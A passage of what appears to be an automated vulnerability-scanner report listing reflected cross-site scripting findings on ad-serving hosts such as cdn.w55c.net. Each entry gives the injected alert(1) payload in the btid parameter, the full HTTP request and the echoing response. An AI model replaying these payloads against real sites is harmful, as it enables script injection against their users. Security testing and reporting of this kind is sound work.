var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
89944_4ac6be9c-d612-4283-b840-a9af68c73ada.js";ebO.fvp="Res/";ebO.dlm=1;ebO.bt=5;ebO.bv=10.000000;ebO.plt=9;ebO.ut=gEbUT;ebO.ifrm=1;ebO.oo=0;ebO.ifl="http://www.pcworld.com/eyeblaster/addineyeV2.html$$b1d44";alert(1)//f5b11ca5280&ncu=";ebO.pv="_4_5_0";ebBv="_2_2_11";ebO.rpv="_2_5_1";ebO.wv="_3_0_1";ebO.ta="-1";ebO.dg="21012";var ebIfrm=("1"=="1");var ebSrc=ebBigS+"eb"+ebO.tn+""+ebBv+".js";document.write("<scr"+"ipt src="+ebSrc
...[SNIP]...

6.57. http://cdn.w55c.net/i/0R99JaasWk_1847829791.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R99JaasWk_1847829791.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fac9c"><script>alert(1)</script>abbca37c72e was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0R99JaasWk_1847829791.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=fac9c"><script>alert(1)</script>abbca37c72e&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAE_LoK5XuIHB0satALga2stUWRTt_29A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFI5OUphYXNXaw&reqid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676502&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658502295&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658502306&frm=1&adk=2614322350&ga_vid=880493158.1303658502&ga_sid=1303658502&ga_hid=2002983713&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:29:44 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:27:54 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 04 Apr 2011 01:02:25 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 6595

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.13;sz=160x600;pc=[TPAS_ID];ord=fac9c"><script>alert(1)</script>abbca37c72e?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
...[SNIP]...

6.58. http://cdn.w55c.net/i/0R99JaasWk_1847829791.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R99JaasWk_1847829791.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1573"><script>alert(1)</script>5e566bb2303 was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0R99JaasWk_1847829791.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1f1573"><script>alert(1)</script>5e566bb2303&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAE_LoK5XuIHB0satALga2stUWRTt_29A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFI5OUphYXNXaw&reqid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676502&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658502295&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658502306&frm=1&adk=2614322350&ga_vid=880493158.1303658502&ga_sid=1303658502&ga_hid=2002983713&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:29:42 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:27:39 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 04 Apr 2011 01:02:25 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 7139

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.13;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUj
...[SNIP]...
53.158901.DATAXU/B4970757.13;abr=!ie;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1f1573"><script>alert(1)</script>5e566bb2303?">
...[SNIP]...

6.59. http://cdn.w55c.net/i/0R9ulNflD0_1008589149.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R9ulNflD0_1008589149.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82beb"><script>alert(1)</script>eb0ccffb874 was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0R9ulNflD0_1008589149.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk482beb"><script>alert(1)</script>eb0ccffb874&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAfQAL6XgK5XGOKLxYbPmt5BBxSOnJCdA1hw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZhWXZLM3ZQaA&ciu=MFI5dWxOZmxEMA&reqid=NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=182&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676624&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658624768&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303658624770&frm=1&adk=2614322350&ga_vid=2012220246.1303658625&ga_sid=1303658625&ga_hid=284855663&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895130&fu=4&ifi=1&dtd=5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:48 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:30:33 GMT
Accept-Ranges: bytes
Last-Modified: Thu, 31 Mar 2011 15:08:20 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1709

<iframe src="http://view.atdmt.com/DEI/iview/310322587/direct/01/NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk
...[SNIP]...
rder="0" src="http://view.atdmt.com/DEI/view/310322587/direct/01/NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk482beb"><script>alert(1)</script>eb0ccffb874NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk482beb">
...[SNIP]...

6.60. http://cdn.w55c.net/i/0R9ulNflD0_1008589149.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R9ulNflD0_1008589149.html

Issue detail

The value of the btid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3a64'%3balert(1)//ae337808dd9 was submitted in the btid parameter. This input was echoed as d3a64';alert(1)//ae337808dd9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0R9ulNflD0_1008589149.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk4d3a64'%3balert(1)//ae337808dd9&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAfQAL6XgK5XGOKLxYbPmt5BBxSOnJCdA1hw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZhWXZLM3ZQaA&ciu=MFI5dWxOZmxEMA&reqid=NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=182&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676624&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658624768&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303658624770&frm=1&adk=2614322350&ga_vid=2012220246.1303658625&ga_sid=1303658625&ga_hid=284855663&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895130&fu=4&ifi=1&dtd=5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:51 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Thu, 31 Mar 2011 15:08:20 GMT
Date: Sun, 24 Apr 2011 14:32:13 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1619

<iframe src="http://view.atdmt.com/DEI/iview/310322587/direct/01/NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk
...[SNIP]...
<img src="http://view.atdmt.com/DEI/view/310322587/direct/01/NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk4d3a64';alert(1)//ae337808dd9NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk4d3a64';alert(1)//ae337808dd9"/>
...[SNIP]...

6.61. http://cdn.w55c.net/i/0R9ulNflD0_1008589149.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R9ulNflD0_1008589149.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abee7"><script>alert(1)</script>75e8d840e7f was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0R9ulNflD0_1008589149.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=abee7"><script>alert(1)</script>75e8d840e7f&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAfQAL6XgK5XGOKLxYbPmt5BBxSOnJCdA1hw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZhWXZLM3ZQaA&ciu=MFI5dWxOZmxEMA&reqid=NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=182&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676624&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658624768&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303658624770&frm=1&adk=2614322350&ga_vid=2012220246.1303658625&ga_sid=1303658625&ga_hid=284855663&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895130&fu=4&ifi=1&dtd=5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:50 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:29:54 GMT
Accept-Ranges: bytes
Last-Modified: Thu, 31 Mar 2011 15:08:20 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 893

<iframe src="http://view.atdmt.com/DEI/iview/310322587/direct/01/abee7"><script>alert(1)</script>75e8d840e7f/abee7"><script>alert(1)</script>75e8d840e7f?click=" frameborder="0" scrolling="no" marginhe
...[SNIP]...

6.62. http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RDMd2Pp56_1855871382.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5b90"><script>alert(1)</script>a60423299b9 was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RDMd2Pp56_1855871382.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NERCNDNGREUwMDBBMzc5ODBBRTU3RUNEMkE2ODc2QjR8R0YyY1FkMmI1VXwxMzAzNjU4NDY0NzM4fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8Mjk5Njc1c5b90"><script>alert(1)</script>a60423299b9&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_3gAKN5gK5X7NKmh2tAAE_twCii5ctWtVYQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5OXBpbjNiag&ciu=MFJETWQyUHA1Ng&reqid=NERCNDNGREUwMDBBMzc5ODBBRTU3RUNEMkE2ODc2QjQ&ccw=SUFCMSMwLjB8SUFCOCMwLjA&bp=299&zc=NzUyMDc&v=0&s=http%3A%2F%2F& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658465628&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658465633&frm=1&adk=2614322350&ga_vid=256767513.1303658466&ga_sid=1303658466&ga_hid=375503836&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:27:15 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 07 Mar 2011 14:26:38 GMT
Date: Sun, 24 Apr 2011 15:19:22 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 965

<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDNGREUwMDBBMzc5ODBBRTU3RUNEMkE2ODc2QjR8R0YyY1FkMmI1VXwxMzAzNjU4NDY0NzM4fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8Mjk5Njc1c5b90"><script>alert(1)</script>a60423299b9?">
...[SNIP]...

6.63. http://cdn.w55c.net/i/0RES95J3Zo_918427505.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RES95J3Zo_918427505.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e7c8"><script>alert(1)</script>b7455b3da66 was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RES95J3Zo_918427505.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz3e7c8"><script>alert(1)</script>b7455b3da66&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAHP6EK5X5HHeFjM058SIacGTDQNRf0Tg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZNQXp6YTk2dA&ciu=MFJFUzk1SjNabw&reqid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=866&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676516&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658516462&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658516467&frm=1&adk=2614322350&ga_vid=1758961832.1303658516&ga_sid=1303658516&ga_hid=2008436335&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:15 GMT
